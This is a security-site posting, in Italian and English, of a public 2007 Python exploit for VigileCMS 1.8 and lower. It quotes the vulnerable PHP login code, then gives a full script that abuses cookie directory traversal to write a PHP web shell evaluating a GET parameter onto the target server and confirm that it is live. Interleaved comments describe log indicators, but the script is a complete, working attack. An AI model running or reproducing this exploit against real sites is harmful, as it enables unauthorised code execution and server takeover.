Opencosmo Security
http://www.opencosmo.com
http://www.opencosmo.com/news.php?readmore=15
VigileCMS <= 1.8 Stealth Remote Command Execution Exploit
Crediti: The:Paradox
Applicazione: VigileCMS
Versione: 1.8
Impatto: Remote Command Execution
Rischio: [3/5]
Exploit: #!/usr/bin/python
#-- coding: iso-8859-15 --
'''
| || | ___ _ _ __ __ _ _ _ __ _ | |___ __
| | ' \/ -)||| ' \/ ` | '/ ` / ` / _ \ \ /
\__|||\|||| ./\,|| \,\__,\_/\\
_ |
---|
This is a Public Exploit. 22/10/2007 (dd-mm-yyyy) |
§ 0day VigileCMS 1.8 Stealth and maybe lower versions - Remote Command Execution §
Vendor: http://www.vigilenapoletano.it
Severity: Highest
Author: The:Paradox
Italy r0x.
Visit inj3ct-it.org
Related Codes:
— index.php; line 64:
if (isset($_COOKIE[rem_user]) and isset ($_COOKIE[rem_pass]) and !isset($_SESSION[user])) {
if(file_exists(USERS_TAB."/$_COOKIE[rem_user].$_COOKIE[rem_pass].php")){
$_SESSION[user] = $_COOKIE[rem_user];
$_SESSION[pass] = $_COOKIE[rem_pass];
logthis("$_SESSION[user] si è collegato al Sito: riconosciuto con Cookie!");
UserVisita ();// aggiornamento database utente per numero di visite
}
}
— func.inc.php; line 93:
function is_admin(){ //## FUNCTION ##
if( (isset($_SESSION[user]) and isset($_SESSION[pass])) && (file_exists(ADMIN_TAB."/$_SESSION[user].$_SESSION[pass].php")) ){
return true;
} else {
return false;
}
}
— func.inc.php; line 109:
function is_superadmin(){ //## FUNCTION ##
include (LOGS_TAB."/creazione.php");
if (isset($_SESSION["user"]) and isset($_SESSION["pass"]) and ($_SESSION[user]==$primo_amministra)) {
return true;
} else {
return false;
}
}
— vedipm.php; line 210:
if ($_POST[ttl] =="") $_POST[ttl]="Nessun oggetto";
$_POST[ttl] =stripslashes($_POST[ttl]);
$_POST[ttl] =htmlspecialchars($_POST[ttl]); // impedisce visualizzazioni caratteri html e maligni tipo javascript
$_POST[cont]=stripslashes($_POST[cont]);
$_POST[cont]=htmlspecialchars($_POST[cont]); // impedisce visualizzazioni caratteri html e maligni tipo javascript
$_POST[cont]=str_replace("\r\n","[br]",$_POST[cont]);
$_POST[cont]=str_replace("<~>","<|>",$_POST[cont]);
$_POST[ttl]=str_replace("<~>","<|>",$_POST[ttl]);
$time = time();
Bug Explanation:
The platform presents some vulnerabilities in the "login system" and in the "private message sender system".
The first vulnerability is in index.php, which verifies the login without an SQL database by checking for the existence of files named Nick.HashMD5Password.php in the "db" directory.
The CMS's developer did not think about directory traversal. In fact, if we try to log in with these cookies:
rem_user = /…/users/Nick
rem_pass = HashMD5Password
Use your brain, do not lame. Enjoy. =)
'''
#Python exploit starts:
# Python 2 only: print statements and the httplib/urllib module names have
# no direct Python 3 equivalent.  The script is a flat top-level sequence:
# argument parsing, two existence probes, two POST requests, one GET probe
# and a final cleanup GET.  Comments below describe only what each visible
# line does, from a defender's point of view (what it touches, what it
# leaves behind, what would show up in logs).
import sys, httplib, urllib
print ""
if len(sys.argv)<=1:
    # No target given: print the usage banner and stop.
    print "################################################"
    print " VigileCMS <= 1.8 Stealth "
    print " Remote Command Execution "
    print " "
    print " Discovered By The:Paradox "
    print " "
    print " Usage: "
    print " %s [Target] [Path] " % (sys.argv[0])
    print " "
    print " Example: "
    print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
    print " "
    print " You may have to set other options in the "
    print " code, like port if it isn't 80 "
    print " or options for old viglecms' versions. "
    print " "
    print "################################################\n"
    sys.exit()
else:
    # Same banner is printed on every run before the requests start.
    print "################################################"
    print " VigileCMS <= 1.8 Stealth "
    print " Remote Command Execution "
    print " "
    print " Discovered By The:Paradox "
    print " "
    print " Usage: "
    print " %s [Target] [Path] " % (sys.argv[0])
    print " "
    print " Example: "
    print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
    print " "
    print " You may have to set other options in the "
    print " code, like port if it isn't 80 "
    print " or options for old viglecms' versions. "
    print " "
    print "################################################\n"
    print "[.]Exploit Starting. "
#Some Vars
# `old` only changes how the query string is joined onto index.php
# (see the pt/pt2 selection further down); nothing else reads it.
old = 0 #set to 1 if you are trying to exploit a 1.6 vigile cms version
port = 80
# `db` is the directory that index.php (quoted in the header) checks for
# Nick.Hash.php files; the script reuses it to locate the page it creates.
db = "db" #Directory of database
target = sys.argv[1]
# Second argument is optional; note that "%sdb/..." below and "%s/index.php"
# further down disagree on whether `directory` is expected to end in "/",
# so a trailing slash yields a "//" in the second set of paths.
try:directory = sys.argv[2]
except IndexError:directory = "/"
#Starting
# Two unauthenticated GET probes for files that ship with the CMS.  From a
# detection standpoint these are ordinary page hits; the 404 checks just
# abort the run when the install layout does not match.
try:
    #Verifing /db/index.php
    conn = httplib.HTTPConnection(target,port)
    conn.request("GET", "%sdb/index.php" % (directory))
    r1 = conn.getresponse()
    print "Verifing existence of-> %s%s%s/index.php" % (target,directory,db),r1.status, r1.reason
    if r1.status == 404:
        sys.exit("[-]/db/index.php not found (404). Aborted.")
    conn.close()
    #Verifing /pm/index.php
    conn = httplib.HTTPConnection(target,port)
    conn.request("GET", "%sdb/pm/index.php" % (directory))
    r1 = conn.getresponse()
    print "Verifing existence of-> %s%s%s/pm/index.php" % (target,directory,db),r1.status, r1.reason
    if r1.status == 404:
        sys.exit("[-]/db/pm/index.php not found (404). Aborted.")
except httplib.ResponseNotReady:
    # Only this one httplib exception is handled; connection refused,
    # timeouts and DNS failures propagate as an uncaught traceback.
    sys.exit("[-]ResponseNotReady. Aborted.")
# URL layout switch: older installs route as /index.php/pag=...?inviapm=...,
# newer ones as /index.php?pag=...&inviapm=... (per the header's note on 1.6).
if old == 1:
    pt = "/"
    pt2 = "?"
else:
    pt = "?"
    pt2 = "&"
# POST #1: a private-message send (pag=vedipm, inviapm=true) whose `to`
# field carries a traversal sequence and a filename, together with the
# rem_user/rem_pass cookies that index.php (header, line 64) turns into a
# file path without sanitising.  For log review: the tell-tale signals are
# a rem_user/rem_pass cookie containing "%2F" / "/" and a PM recipient
# that is not a plain username.
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': '…/.paradox-got-this-one.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F…%2F; rem_pass=%2Findex;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #1 –>",response.status, response.reason
conn.close()
# POST #2: same request shape, but rem_user now carries a URL-encoded PHP
# tag that evals a GET parameter named `dox`, and rem_pass names the file
# created by POST #1.  A cookie value containing "%3C%3Fphp" (i.e. "<?php")
# is a strong IDS/WAF indicator for this request.
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': '…/igotyourbox.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F…%2F%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E; rem_pass=paradox-got-this-one;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #2 –>",response.status, response.reason
conn.close()
# Success check: a plain GET for the page the script expects to have been
# written under <directory>/<db>/.  Any file under db/ that is not part
# of the stock install is an artefact worth collecting during IR.
try:
    conn = httplib.HTTPConnection(target,port)
    path = "%s%s/igotyourbox.php" % (directory,db)
    conn.request("GET", path)
    r1 = conn.getresponse()
    conn.close()
except httplib.ResponseNotReady:
    sys.exit("[-]ResponseNotReady. Aborted.")
print "[.]Verifing Exploit Success…"
if r1.status == 404:
    sys.exit("[-]Exploit Failed.")
else:
    print "[+]Done.\n[+]Removing the page…"
    # "Removing the page" is only partial: the `dox` parameter unlinks the
    # file created by POST #1, while igotyourbox.php itself is left in
    # place (the final message even advertises it).  Responders should
    # therefore expect at least that file to survive on a compromised host.
    # The response of this last GET is never read or closed.
    conn = httplib.HTTPConnection(target,port)
    path = directory + "db/igotyourbox.php?dox=unlink('%3C?php%20eval(stripslashes($_GET[dox]));%20?%3E.paradox-got-this-one.php');"
    conn.request("GET", path)
    print "[+]Success :D Exploited.\n\n A PHP Page Has Been Created -> %s%s%s/igotyourbox.php \n With Content:\n \n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,directory,db)
Soluzione: Nessuna soluzione disponibile. Scrivere all'amministratore per aggiungere questa informazione.